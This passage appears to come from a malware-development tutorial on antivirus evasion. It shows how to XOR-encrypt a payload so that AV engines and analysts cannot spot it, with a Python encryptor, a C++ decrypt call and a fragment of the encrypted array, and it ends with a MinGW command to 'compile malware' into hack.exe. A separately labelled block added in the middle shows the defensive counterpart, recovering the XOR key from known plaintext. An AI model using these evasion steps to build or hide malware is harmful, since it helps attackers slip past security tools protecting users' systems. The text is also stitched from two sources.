04 Evasion Encryption
First we must encrypt our payload. Why encrypt it at all? The basic purpose is to hide the payload from an AV engine or a reverse engineer, so that the payload cannot easily be identified by looking at the file.
The purpose of encryption is to transform data in order to keep it secret from others. For simplicity, we use XOR encryption in our case.
Let's take a look at how XOR is used to encrypt and decrypt our payload.
//....
// decrypt payload in place before it is used: deXOR is the inverse of the
// XOR applied by the Python script below (repeating key, same operation)
deXOR((char*)payload, sizeof(payload), secretKey, sizeof(secretKey));
// etc...
// tail of the encrypted payload array as emitted by the script
// (the beginning of the array is not shown on the page)
0xee, 0xa2, 0x9a, 0x71, 0x9c, 0x8d, 0x9a, 0x3c, 0x70, 0xa6, 0x2b, 0xf1,
0xa1, 0x5c, 0xb0 };
For that, create a simple Python script which encrypts the payload and replaces it in our C++ template:
import sys
import os
import hashlib
import string

## XOR a str/bytes buffer against a repeating str key; the result is a str
## whose code points are the XORed byte values (the same routine decrypts)
def xor(data, key):
    output_str = ""
    for i in range(len(data)):
        current = data[i]
        current_key = key[i % len(key)]
        ordd = lambda x: x if isinstance(x, int) else ord(x)
        output_str += chr(ordd(current) ^ ord(current_key))
    return output_str

## encrypting: print the ciphertext as a C array initializer
def xor_encrypt(data, key):
    ciphertext = xor(data, key)
    ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };'
    print(ciphertext)
    return ciphertext, key

## the lines that read the payload, call xor_encrypt and paste the array
## into the C++ template are not shown on the page
python3 xor.py
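The analyst's side of the same transform, as an added example that is not code from the original page: parse the `{ 0x.., 0x.. };` literal the script prints back into bytes and, given a short stretch of known plaintext, recover the repeating XOR key and decrypt. The plaintext and the key value are constructed stand-ins, and `from_c_array`, `recover_key` and the other names are this example's own.

```python
import re
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def to_c_array(buf: bytes) -> str:
    """Format bytes like the page's xor_encrypt does (zero-padded here)."""
    return '{ 0x' + ', 0x'.join(f'{b:02x}' for b in buf) + ' };'

def from_c_array(text: str) -> bytes:
    """Parse a '{ 0x.., 0x.. };' literal back into bytes."""
    return bytes(int(h, 16) for h in re.findall(r'0x([0-9a-fA-F]{1,2})', text))

def recover_key(ciphertext: bytes, known_plaintext: bytes, max_key_len: int = 64):
    """Known-plaintext recovery of a repeating XOR key.

    For each candidate length, derive the key from the first bytes and keep
    it only if it explains every known byte. Candidate lengths are capped at
    half the known prefix so each key byte is checked at least twice; with a
    shorter prefix the key cannot be pinned down and None is returned."""
    for klen in range(1, min(max_key_len, len(known_plaintext) // 2) + 1):
        key = bytes(c ^ p for c, p in zip(ciphertext[:klen], known_plaintext[:klen]))
        if xor_bytes(ciphertext[:len(known_plaintext)], key) == known_plaintext:
            return key
    return None

# Constructed sample: not a real payload, just bytes to exercise the round trip.
SAMPLE_PLAINTEXT = b"constructed sample bytes standing in for a payload, not real code"
SAMPLE_KEY = b"secretKey"  # hypothetical key value; the page does not show its key
SAMPLE_C_ARRAY = to_c_array(xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY))

def demo():
    """Recover the key from the C array knowing only the first 20 plaintext bytes."""
    ct = from_c_array(SAMPLE_C_ARRAY)
    key = recover_key(ct, SAMPLE_PLAINTEXT[:20])
    return key, (xor_bytes(ct, key) if key else None)

if __name__ == "__main__":
    k, pt = demo()
    print("recovered key:", k)
    print("decrypted    :", pt)
```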
Compile malware:
x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
.\hack.exe